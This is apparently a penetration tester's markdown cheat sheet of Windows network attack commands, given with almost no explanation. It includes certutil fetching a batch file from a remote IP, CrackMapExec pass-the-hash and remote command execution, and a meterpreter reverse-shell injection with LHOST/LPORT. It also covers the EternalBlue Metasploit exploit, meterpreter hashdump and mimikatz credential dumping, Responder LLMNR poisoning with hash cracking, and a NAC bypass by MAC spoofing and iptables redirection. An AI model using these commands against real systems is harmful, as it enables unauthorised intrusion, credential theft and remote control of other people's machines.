---
tags: Windows
---

# Windows

## File Download

- `certutil.exe -urlcache -split -f http://10.10.10.10:9001/launcher.bat`

## CrackMapExec

[CME Github](https://github.com/byt3bl33d3r/CrackMapExec/wiki/Getting-Shells-101)

- `crackmapexec smb 192.168.10.11`
- `crackmapexec smb 192.168.10.11 -u 'user' -p 'pass'`
- `crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami --local-auth` (local test)
- `crackmapexec smb 192.168.10.11 -u username -H LMHASH:NTHASH`
- `crackmapexec smb 192.168.10.11 -u username -H NTHASH`
- `crackmapexec 192.168.10.0/24 -u username -p password -M metinject -o LHOST=192.168.10.3 LPORT=8443`

## MS17_010

- `nbtscan -r 10.12.103.1/8 > nbtscan.text; cut -f1 -d' ' nbtscan.text > ms_17_10_ip_list`
- `nmap -p445 --script smb-vuln-ms17-010 -iL ms_17_10_ip_list`

**eternalblue**

- `use exploit/windows/smb/ms17_010_eternalblue`
- `use exploit/windows/smb/ms17_010_psexec`
- `set payload windows/x64/meterpreter/reverse_tcp`
- `set VerifyArch false`
- `set VerifyTarget false`
- `set ProcessName lsass.exe`

**meterpreter**

- `sysinfo`
- `getuid`
- `hashdump`
- `load mimikatz`
- `mimikatz_command -f samdump::hashes`
- `mimikatz_command -f sekurlsa::searchPasswords`
- `kerberos`
- `msv`
- `use incognito`
- `list_tokens -u`

## LLMNR and NBT-NS Poisoning

- `python Responder.py -i 192.168.1.77 -b 0`
- `python Responder.py -I eth0 -wrf`
- `python Responder.py -I eth0 -wfv`

**Responder/log**

- `john SMB-NTLMv2-Client-192.168.1.74.txt --show`

## NAC Bypass

- `macchanger -m 00:0c:29:6c:64:85 eth0`

**sudo vim /etc/network/interfaces**

- `auto eth0`
- `iface eth0 inet static`
- `address 192.168.0.100/24 (192.168.0.99)`
- `gateway 192.168.0.254`
- `netmask 255.255.255.0`

**Forescout**

> The NAC comes and checks a program on your machine; to get around it, you redirect all of its requests to another machine on the network.

- `iptables -t nat -A POSTROUTING -j MASQUERADE`
- `iptables -t nat -A PREROUTING -i eth0 -j DNAT --to 10.2.160.11`
- `echo 1 > /proc/sys/net/ipv4/ip_forward`